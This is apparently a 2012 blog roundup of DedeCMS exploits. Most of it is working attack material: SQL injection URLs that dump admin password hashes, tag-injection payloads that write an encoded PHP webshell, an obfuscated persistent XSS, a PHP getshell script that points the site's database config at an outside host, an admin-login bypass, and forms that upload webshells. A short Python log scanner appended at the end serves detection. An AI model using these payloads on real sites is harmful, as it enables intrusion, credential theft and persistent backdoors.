
DedeCMS vulnerability roundup

Posted on 2012-10-18 10:42:14

Dedecms 5.6 rss.php injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCms v5.6 embedded malicious code execution vulnerability
Register a member account and go to "upload software"; in the local address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, a one-line webshell written directly to disk.
Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below and visit it; this triggers the XSS and installs an XSS rootkit. Note that IE8/9 and similar browsers block URL-based XSS, so the XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser. However any of the URLs below is visited afterwards, our XSS fires.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php
DeDeCMS (Zhimeng) variable-overwrite getshell
#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com
www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
// Getshell() returns only the first response line; in "HTTP/1.1 200 OK" the "OK" sits at offset 13
if (strpos($exp,"OK")>12){
echo "Exploit Success \n";
if($aid==1)echo "Shell:".$url."/$path/data/cache/fuck.php\n";
if($aid==2)echo "Shell:".$url."/$path/fuck.php\n";
if($aid==3)echo "Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
// POST body: the _COOKIE[GLOBALS][cfg_db*] fields overwrite the database configuration
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "No response from ".$host."\n";
return "";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>
DedeCms v5.6-5.7 authorization bypass vulnerability (direct entry to the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change validate=dcug above to the current captcha value and you go straight into the site backend.

The precondition for this vulnerability is that the backend path must already be known.
Dedecms (Zhimeng) tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert the row: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
Then submit with the form below and the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member backend, publish an article and upload an image, then in attachment management replace the image with our crafted template. Say the image name is:
uploads/userup/2/12OMX04-15A.jpg
The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(this is the crafted part)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>
Submit; if it reports that the edit succeeded, we have changed the template path.
3. Visit the modified article:
Assuming the article just edited has aid 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.
DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
Construct the form above; after uploading, the image is saved as /uploads/userup/3/1.gif
Publish an article, then construct the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>
Zhimeng (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
Zhimeng (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character MD5 value; to get the 16-character MD5, remove 3 more from the front and 1 from the end.
Zhimeng (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
Zhimeng (Dedecms) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
Zhimeng (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
It exploits a MySQL numeric field overflow that raises an error, combined with DEDECMS writing database error messages into a PHP file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
You can see the error message.
2. Visit
http://www.abc.com/data/mysql_error_trace.php and seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. Run the file test.html from dede.rar; note that the form's action address is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After pressing OK, seeing the output from step 2 means the file trojan was uploaded successfully.
Zhimeng (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
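As an added defensive example (not part of the original post): a small Python scanner that flags the request shapes catalogued in this thread in web-server access logs, one rule per technique (GLOBALS config overwrite, {dede:...} tag injection, raw sql= to advancedsearch.php, updatexml error-based injection, UNION SELECT against dede_admin, the gotopage XSS, the edit_face.php / carbuyaction.php traversal and the digg_frame.php error-log injection). It assumes an Apache combined log with one extra trailing quoted Cookie field (POST bodies are not in access logs, so the mytag_js.php variant is only visible when the GLOBALS fields travel in the cookie); the rule names and the sample log lines are constructed for this example.

```python
"""Flag the DedeCMS request patterns from this thread in access-log lines."""
import re
from urllib.parse import unquote_plus

# Assumed log format (constructed): Apache combined log plus one trailing
# quoted "%{Cookie}i" field, so cookie-borne GLOBALS overwrites are visible.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]*)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"(?: "(?P<cookie>[^"]*)")?'
)

# One rule per technique in the write-up, run over the percent-decoded
# request target and Cookie header (rule names are this example's own labels).
RULES = [
    ("globals_overwrite", re.compile(r"GLOBALS\]\[cfg_|(?<![\w\]])GLOBALS\[cfg_", re.I)),
    ("dede_tag", re.compile(r"\{/?dede:\w+", re.I)),  # {dede:php} / {dede:field ...}
    ("runphp_tag", re.compile(r"runphp\s*=\s*['\"]?yes", re.I)),
    ("advancedsearch_raw_sql", re.compile(r"advancedsearch\.php\?[^ ]*\bsql=", re.I)),
    ("error_based_sqli", re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I)),
    ("union_select_admin", re.compile(r"union\s+select\b[^\n]*\bdede_admin\b", re.I)),
    ("gotopage_xss", re.compile(r"gotopage=[^&\s]*<script", re.I)),
    ("path_traversal", re.compile(r"(?:oldface|code)=[^&\s]*\.\./", re.I)),
    ("mysql_error_php_inject", re.compile(r"digg_frame\.php\?[^\n]*\*/[^\n]*\$_POST", re.I)),
]


def decode(value):
    """Percent-decode twice so double-encoded payloads are normalised as well."""
    return unquote_plus(unquote_plus(value or ""))


def classify(target, cookie=""):
    """Return the sorted names of every rule that fires on one request."""
    haystack = decode(target) + "\n" + decode(cookie)
    return sorted(name for name, rx in RULES if rx.search(haystack))


def scan(lines):
    """Return (ip, target, hits) for each parsable log line that trips a rule."""
    flagged = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip it rather than crash the scan
        hits = classify(m["target"], m["cookie"])
        if hits:
            flagged.append((m["ip"], m["target"], hits))
    return flagged


# Constructed sample log: payload shapes follow the write-up; hosts and IPs are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20updatexml(1,(SELECT%20CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d)%20FROM%20dede_admin),1)%23%27][0]=1 HTTP/1.1" 500 312 "-" "Mozilla/5.0" "-"',
    '10.0.0.6 - - [18/Oct/2012:10:43:01 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 1840 "-" "Mozilla/5.0" "-"',
    '10.0.0.7 - - [18/Oct/2012:10:44:20 +0800] "GET /dede/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=203.0.113.10&_POST[GLOBALS][cfg_dbuser]=root HTTP/1.1" 302 0 "-" "Mozilla/5.0" "-"',
    '10.0.0.8 - - [18/Oct/2012:10:45:00 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Eeval(String.fromCharCode(80,101))%3C/script%3E%3Cx=%22 HTTP/1.1" 200 2210 "-" "Mozilla/5.0" "-"',
    '10.0.0.9 - - [18/Oct/2012:10:46:10 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 44 "-" "Mozilla/5.0" "PHPSESSID=abc"',
    '10.0.0.10 - - [18/Oct/2012:10:47:33 +0800] "POST /plus/mytag_js.php?aid=1 HTTP/1.1" 200 55 "-" "Mozilla/5.0" "GLOBALS[cfg_dbhost]=203.0.113.10; GLOBALS[cfg_dbuser]=exploit"',
    '10.0.0.11 - - [18/Oct/2012:10:48:02 +0800] "GET /plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?%3E HTTP/1.1" 200 0 "-" "Mozilla/5.0" "-"',
    '10.0.0.12 - - [18/Oct/2012:10:49:00 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 9120 "-" "Mozilla/5.0" "-"',
    '10.0.0.13 - - [18/Oct/2012:10:49:30 +0800] "GET /plus/advancedsearch.php?mid=1&keyword=dede HTTP/1.1" 200 3000 "-" "Mozilla/5.0" "-"',
]

if __name__ == "__main__":
    for ip, target, hits in scan(SAMPLE_LOG):
        print(f"{ip:<10} {', '.join(hits):<24} {target[:70]}")
```

The last two sample lines are benign controls: a normal article view and an advancedsearch.php request without a sql= parameter produce no hits.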